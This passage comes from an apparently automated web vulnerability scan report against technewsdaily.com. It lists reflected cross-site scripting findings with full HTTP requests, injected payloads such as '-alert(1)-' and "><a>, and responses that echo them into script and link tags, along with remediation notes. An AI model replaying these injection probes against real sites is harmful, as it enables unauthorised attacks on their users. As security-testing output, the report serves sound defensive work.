Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=kq0tas2bar2akbcou8l1gujn23; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 01:21:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/?f7de0'-alert(1)-'484fbe1e4c0=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.127. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /new-cell-network-doesnt-depend-on-towers--0882/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e85"><a>e4f38b36690 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /new-cell-network-doesnt-depend-on-towers--0882/?67e85"><a>e4f38b36690=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 01:21:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=2g2ap04jqcaj9krnjid7ip9on4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 01:21:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65060

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/?67e85"><a>e4f38b36690=1/" />
...[SNIP]...

1.128. http://www.technewsdaily.com/newsletter-subscription/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /newsletter-subscription/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f3b7'-alert(1)-'214cc2106d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsletter-subscription7f3b7'-alert(1)-'214cc2106d6/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/newsletter-subscription7f3b7'-alert(1)-'214cc2106d6/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.129. http://www.technewsdaily.com/newsletter-subscription/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /newsletter-subscription/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c14'-alert(1)-'162c30e436 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsletter-subscription/?88c14'-alert(1)-'162c30e436=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/newsletter-subscription/?88c14'-alert(1)-'162c30e436=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.130. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /next-google-phone-samsung-nexus-s-is-official-1754/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba524'-alert(1)-'43ee8bcdc30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /next-google-phone-samsung-nexus-s-is-official-1754ba524'-alert(1)-'43ee8bcdc30/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754ba524'-alert(1)-'43ee8bcdc30/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.131. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /next-google-phone-samsung-nexus-s-is-official-1754/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4ef'-alert(1)-'51f06504e6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /next-google-phone-samsung-nexus-s-is-official-1754/?ea4ef'-alert(1)-'51f06504e6c=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/?ea4ef'-alert(1)-'51f06504e6c=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.132. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /next-google-phone-samsung-nexus-s-is-official-1754/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4938"><a>196e933abb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /next-google-phone-samsung-nexus-s-is-official-1754/?f4938"><a>196e933abb8=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/?f4938"><a>196e933abb8=1/" />
...[SNIP]...

1.133. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /phone-chip-technology-std-diagnosis-1586/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload add07'-alert(1)-'05a3cfbc6c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /phone-chip-technology-std-diagnosis-1586add07'-alert(1)-'05a3cfbc6c4/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40478

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586add07'-alert(1)-'05a3cfbc6c4/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.134. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /phone-chip-technology-std-diagnosis-1586/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c48b0'-alert(1)-'3f8027afe8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /phone-chip-technology-std-diagnosis-1586/?c48b0'-alert(1)-'3f8027afe8b=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61418

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
cript type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/?c48b0'-alert(1)-'3f8027afe8b=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.135. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /phone-chip-technology-std-diagnosis-1586/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25952"><a>fcc365c0685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /phone-chip-technology-std-diagnosis-1586/?25952"><a>fcc365c0685=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61780

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/?25952"><a>fcc365c0685=1/" />
...[SNIP]...

1.136. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /play-video-games-without-the-console-with-onlive-1794/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e603d'-alert(1)-'4f41bcc1c22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /play-video-games-without-the-console-with-onlive-1794e603d'-alert(1)-'4f41bcc1c22/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
"text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794e603d'-alert(1)-'4f41bcc1c22/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.137. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /play-video-games-without-the-console-with-onlive-1794/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cc92'-alert(1)-'99582f0ba3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /play-video-games-without-the-console-with-onlive-1794/?7cc92'-alert(1)-'99582f0ba3a=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
ext/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/?7cc92'-alert(1)-'99582f0ba3a=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.138. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /play-video-games-without-the-console-with-onlive-1794/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db8d9"><a>790bce3272c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /play-video-games-without-the-console-with-onlive-1794/?db8d9"><a>790bce3272c=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69245

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/?db8d9"><a>790bce3272c=1/" />
...[SNIP]...

1.139. http://www.technewsdaily.com/privacy-policy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /privacy-policy/

Issue detail

